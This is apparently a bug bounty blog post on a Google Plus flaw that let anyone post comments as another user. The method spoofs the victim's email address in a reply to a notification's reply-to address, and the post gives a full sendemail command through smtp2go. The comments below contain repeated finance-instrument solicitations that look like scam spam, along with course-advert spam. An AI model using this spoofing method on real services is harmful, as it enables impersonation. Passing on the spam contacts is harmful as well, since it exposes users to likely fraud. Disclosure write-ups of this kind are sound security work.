Google Bug Bounty:Commenting on any user's behalf.
on
Get link
Facebook
X
Pinterest
Email
Other Apps
Hey peeps,
Hope you all are doing well :) Today I'll be sharing one of my finding in Google Plus.As you guys already understood that this issue is about user impersonation vulnerability.Using this issue an attacker could've commented on any user's behalf.The attacker only needs is victims e-mail address.And I think when it comes about Google you don't have to worry about getting victim's e-mail address.There must be a way around for this.Or you can just enumerate e-mail addresses ^_^ .Whatever, First thing first actually I got the initial idea from this One by Zahid Ali.So, a grand thanks goes to Zahid :)
Proof Of Concept:
Well it's too easy.
All you've to do is send a mail from victims e-mail(mail will be posted as a comment).Google Mail is vulnerable to e-mail spoofing so this made the attack easy.But How to spoof e-mail addresses?
Well, There are plenty of e-mail spoofing website you'll find.
However, I used smt2go to reproduce the bug.
Steps to reproduce:
First off all create an account in smtp2go.com.After that custom password will be given.
Now
I'll Use two accounts.Using the first account comment on a post.
Now using the 2nd account comment in the same post.
After that you'll receive a mail regarding another user commented on the same post and if you reply to the mail it will be posted as a comment.Just pressing the Reply button we can get the reply-to e-mail which is required.
There are some commands needed in order to send an e-mail with Terminal Emulator.These are the commands that I used.
-f command means from.So I'll enter the victim's e-mail after -f.In my testing, I'll be posting from my test account which e-mail is sonjoyd45@gmail.com
-t command means to.So I'll use reply-to email here which we found before.
-u command means subject.We can ignore this as this is not necessary.
-m command means message.This is where I'll write a comment.
-s command means server and port.As we're using smtp2go server so the server and port will be mail.smtp2go.com:2525
-xu means smtp2go username.Mine one is asad0x01@gmail.com
-xp means smtp2go account password.Mine one is **********
This is how mine one looked like:
sendemail -f sonjoyd45@gmail.com -t replyto+CkJDZ3huY0d4MWMxOXpkSEpsWVcwYUlYb3hNbTEyTVhWM2RtMXhZbmRtZHpFeE1qTXdlV3hoY1hCclpYRjZOWGx0ZUEQ3YqjoZYFKiF6MTJtdjF1d3ZtcWJ3ZncxMTIzMHlsYXFwa2VxejV5bXg+AI3v7_UAAAAAWVpeiPboAVpgGvveUFlIbF1NLqajFk5h@plus.google.com -u whatever -m this is test comment -s mail.smtp2go.com:2525 -xu asad0x01@gmail.com -xp *********
Pressing the enter button we'll receive a response regarding the e-mail is sent successfully 😄
Refresh the post page and guess what?A comment is made on victim's behalf :")
We are broker firm in London-UK, we have direct Provider of BG/SBLC specifically for Lease and purchase, The provider is tested and trusted. We have been dealing with the company for paste 20 years. Interested Agent/Lessee should contact us. Email: longmornprojectsfinance@gmail.com Skype ID: longmornprojectsfinance@hotmail.com Whatsapp: +1(330)333-0498 Best regards
I am a direct Mandate to a genuinely renowned Investment Finance Company offering Cash & Asset Backed Financial Instruments on Lease and Sale at the best rates and with the most feasible procedures.
Instruments offered can be put in all forms of trade and can be monetized or discounted for direct funding. For Inquiry contact.
Nice Article.
ReplyDelete
ReplyDeleteTruly good job!!! The admin was providing the useful post and I like to you additional info from your blog. Thank you...
Tableau Training in Chennai
Tableau Certification in Chennai
Pega Training in Chennai
Primavera Training in Chennai
Unix Training in Chennai
Power BI Training in Chennai
Job Openings in Chennai
Excel Training in Chennai
Tableau Training in Vadapalani
Tableau Training in Thiruvanmiyur
This comment has been removed by the author.
ReplyDeleteDear Sir
ReplyDeleteWe are broker firm in London-UK, we have direct Provider of BG/SBLC specifically for Lease and purchase, The provider is tested and trusted. We have been dealing with the company for paste 20 years. Interested Agent/Lessee should contact us.
Email: longmornprojectsfinance@gmail.com Skype ID: longmornprojectsfinance@hotmail.com Whatsapp: +1(330)333-0498 Best regards
Dean Thomas.
Dear Sir
ReplyDeleteI am a direct Mandate to a genuinely renowned Investment Finance Company offering Cash & Asset Backed Financial Instruments on Lease and Sale at the best rates and with the most feasible procedures.
Instruments offered can be put in all forms of trade and can be monetized or discounted for direct funding. For Inquiry contact.
Email: longmornprojectsfinance@gmail.com
Skype ID: longmornprojectsfinance@hotmail.com
Whatsapp: +1(330)333-0498
Warm Regard
Dean Thomas